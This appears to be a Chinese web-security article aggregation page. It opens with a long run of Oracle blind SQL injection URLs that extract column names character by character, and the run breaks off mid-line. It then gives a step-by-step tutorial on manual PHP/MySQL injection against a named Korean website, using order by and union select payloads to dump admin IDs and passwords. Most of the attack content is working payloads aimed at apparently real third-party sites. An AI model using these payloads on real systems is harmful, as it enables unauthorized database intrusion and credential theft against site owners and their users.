www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

? 以下为猜解第二列:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_N

篇9:和我一起学PHP手工注入脚本安全

作者:冰的原点[L.S.T]

看了这么多的ASP注入的,各位是不是已经厌倦了ASP方面的注入呢?呵呵,千万不能厌倦呀,只有不断的学习,才不会被别人甩很远的!那么今天就跟着我一起学习下PHP环境下的手工注入吧.

今天的网站是一韩国的站点,注入点我已经找到了,大家如果怕麻烦的话,可以用啊D找下注入点,其实啊D不仅能找出ASP环境下的注入点,而且PHP,ASPX以及JSP的都可以找出来的哦,截张图大家看下,如图1.

其实找注入点这种事对啊D来说还是很容易的,不过接下来的事就得靠我们自己的双手来进行了.回到正文上,我们首先要判断下数据库是不是使用的mysql,在注入点处输入/*,如果正常返回的话就说明是mysql的了,因为mysql数据是支持/*的注释的,如图2,返回正确页面,然后我们得判断下mysql的版本,如果支持union查询就好办多了,我们在注入点处输入如下语句:and ord(mid(version(),1,1))>51/*,返回正常,如图3..说明数据库版本是大于4.0的,也就是说支持union查询的.到这里我们最好先判断下权限,如果是root的话后面的提权就好办多了,我们提交:ord(mid(user(),1,1))=114/*,返回错误,说明不是root的权限,只能老老实实的猜表啦.好,接下来猜它的字段数,利用order by 后面加数字的方法能够很快猜出字段数,例如我提交:www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 10,返回正常,说明字段数大于10的,如图4,继续猜,然后提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 20,返回错误,如图5,说明字段数小于20,接下来就是苦力活了,当我们提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 17正常,而www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 18时错误,说明字段数就是17了,接下来就得猜列名了咯,我们提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*如图6.在网页中显示出的数字中替换成我们的语句,我们继续提交,www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17/*,如图7,出现了版本号和当然数据库用户名了,接下来当然是猜表啦,首先我们想到的当然是admin这个表啦,继续提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回正常,说明存在admin这个表的,接下来就是最关键的地方了,我们得猜下用户名和密码的,提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),username,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回错误,看来不存在username这个列名,接下来就是漫长的猜解过程啦,可是始终没有猜到用户名,不过倒是把ID和密码猜出来的,我提交的语句是这样的:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),id,passwd,9,10,11,12,13,14,15,16,17%20from%20admin/*,呵呵,暴出来了,如图8

文章到这里就要结束了,其实在乎只是这个过程而已,没有暴出用户名,而且后面的后台也没有找到,所以就只能放一放啦!不过,希望各位叉子能从本文学点东西的话,本文就会有它的价值了!

Discuz XSS得webshell脚本安全

vbs调用php脚本安全

也谈跨站脚本攻击与防御脚本安全

Oracle SQL Injection Cheat Sheet脚本安全

闪存博客SQL注入脚本安全

PHP安全 XSS篇

phpfusion的一个Xday分析脚本安全

waf绕过:mysql注入waf绕过技巧脚本安全

确保PHP应用程序的安全[2]WEB安全

鸡肋的反射性xss脚本安全

BBSXP,很多注入脚本安全
《BBSXP,很多注入脚本安全.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【BBSXP,很多注入脚本安全(共9篇)】相关文章:

跨站脚本漏洞的利用教程2023-05-16

双引号被过滤时配置文件插一句话的方法脚本安全2022-10-25

如何防范网站数据库入侵2022-11-30

如何修复被挂木马的php网站WEB安全2023-02-11

web安全学习之xss个人总结2023-02-14

利用instr函数防止SQL注入攻击2022-04-29

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警2022-05-31

财务软件实施维护工程师简历表格2022-05-08

宣传片制作合同2022-09-10

对方伪造协议书的2022-05-06